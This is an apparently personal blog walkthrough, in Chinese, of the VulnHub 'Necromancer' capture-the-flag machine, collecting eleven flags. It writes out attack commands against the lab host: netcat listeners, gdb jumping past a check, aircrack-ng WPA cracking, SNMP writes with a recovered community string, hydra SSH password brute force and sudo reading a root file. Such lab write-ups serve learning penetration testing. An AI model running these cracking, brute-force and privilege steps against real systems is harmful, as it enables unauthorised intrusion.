vulnhub Necromancer wp

flag1

nmap -sU -T4 192.168.220.130 有666端口

nc -nvu 192.168.220.130 666 监听回显消息

tcpdump host 192.168.220.130抓包查看发现有到4444端口的流量

nc -nvlp 4444 监听发现字符串,解码后得到flag1

flag2

根据flag1的解码字符串提示,在监听666端口时输入opensesame,得到flag2

flag3

访问80端口,下载图片binwalk查看,是个压缩包,dd或者直接改后缀名解压缩,得到flag3

flag4

谷歌搜索提示magic items wiki将网站内容制作为字典爆破目录(连不上google失败),得到tailsman文件

cewl https://en.wikipedia.org/wiki/List_of_mythological_objects -d 0 -w /root/Desktop/magicItems.txt –v

修改权限为777,执行没有结果

debug

gdb ./tailsman
info functions
break wearTalisman #穿衣服时打断点
run
jump chantToBreakSpell #跳到断点,得到flag4

flag5

flag4为md5,解密为blackmagic,根据flag监听31337

nc -nvu 192.168.220.130 31337

输入blackmagic得到flag5

flag6

flag5提示/thenecromancerwillabsorbyoursoul/

访问得到flag6

flag7

thenecromancerwillabsorbyoursoul界面的图片链接点击后下载得到压缩包,解压后为pcap,协议为802.11,所以是无线网络

aircrack-ng破解

aircrack-ng ./necromancer.cap -w /usr/share/wordlists/rockyou.txt

得到key death2all

snmp-check -c death2all -v 1 -t 1 192.168.220.130 #查看到flag7
snmpwalk -v 2c -c death2allrw 192.168.220.130 #查看OID
snmpset -c death2allrw -v 1 192.168.220.130 iso.3.6.1.2.1.1.6.0 s Unlocked #根据OID解锁
snmp-check -c death2all -v 1 192.168.220.130

flag8、9、10

flag7的md5为demonslayer,且显示22端口,尝试爆破密码

hydra -l demonslayer -P /usr/share/wordlists/rockyou.txt 192.168.220.130 ssh

得到密码12345678,ssh连接有个flag8文件

根据提示监听777端口

nc -u localhost 777,敲击回车两次,之后根据谷歌得到的答案回答得到flag8、9、10

flag11

ctrk+c返回,ls -al查看有.smallvile文件,打开没有线索

sudo -l查看有/bin/cat 和/root/flag11.txt

执行sudo /bin/cat /root/flag11.txt,结束

posted @ 2022-04-01 15:06  JICEY  阅读(37)  评论(0编辑  收藏  举报